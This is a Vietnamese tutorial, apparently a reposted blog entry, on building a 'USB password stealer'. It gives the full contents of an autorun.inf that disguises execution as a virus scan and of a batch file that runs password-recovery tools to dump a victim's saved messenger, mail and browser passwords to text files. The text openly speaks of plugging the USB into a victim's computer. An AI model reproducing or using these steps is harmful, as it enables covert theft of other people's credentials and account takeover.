Như chúng ta đã biết hầu hết các hầu hết các trang web đều có một khẩu để đăng nhập vào như MSM Messenger, yahoo, … Rất nhiều người đã lưu mật khẩu đó vào trình duyệt của họ, và như đã biết thì có rất nhiều công cụ khôi phục mật khẩu đã lưu vì nên trong bài viết này tôi sẽ giải thích cho bạn về làm thế nào để thực hiện “Usb password stealer” – USB đánh cắp mật khẩu và ăn cắp mật khẩu đã lưu.
Những điều bạn cần:
MessenPass – MessenPass là một công cụ phục hồi mật khẩu cho thấy các mật khẩu của các ứng dụng tin nhắn tức thời
Mail PassView – Mail PassView là một công cụ phục hồi mật khẩu nhỏ thấy các mật khẩu và thông tin tài khoản khác cho Outlook Express, Windows Mail , POP3 vv
IE Passview – IE PassView là một chương trình nhỏ giúp chúng ta xem mật khẩu đã lưu trong Internet Explorer.
Protected storage pass viewer(PSPV)- Protected Storage PassView là một tiện ích nhỏ cho thấy các mật khẩu được lưu trữ trên máy tính của bạn bằng Internet Explorer, Outlook Express, MSN Explorer.
Password Fox – Password fox là một chương trình nhỏ sử dụng để phục hồi các mật khẩu được lưu trong Firefox.
Bây giờ là các bước tạo USB password stealer để đánh cắp mật khẩu đã lưu.
- Đầu tiên tải về 5 công cụ về và sao chép các file thực thi vào USB (mspass.exe , mailpv.exe , iepv.exe , pspv.exe và passwordfox.exe)
- Sau đó bật notepad lên và gõ dòng lệnh vào

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

và lưu lại với tên autorun.inf và chép lên USB của bạn.
- Tạo một notepad khác và viết các dòng lệnh sau:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

lưu lại với tên launch.bat rồi chép vô USB luôn
Bây giờ USB đã sẵn sàng, tất cả những gì bạn phải làm là cắm nó vào máy tính nạn nhân và một popup sẽ xuất hiện, trong cửa sổ popup chọn tùy chọn (virus Launch scan) ngay sau khi bạn nhấp vào nó sẽ cửa sổ sau sẽ xuất hiện.
Tạo USB để ăn cắp mật khẩu

Sau đó bạn lưu file mật khẩu vào file txt
Done!!!!

nguồn:trungtin.info
Quảng Cáo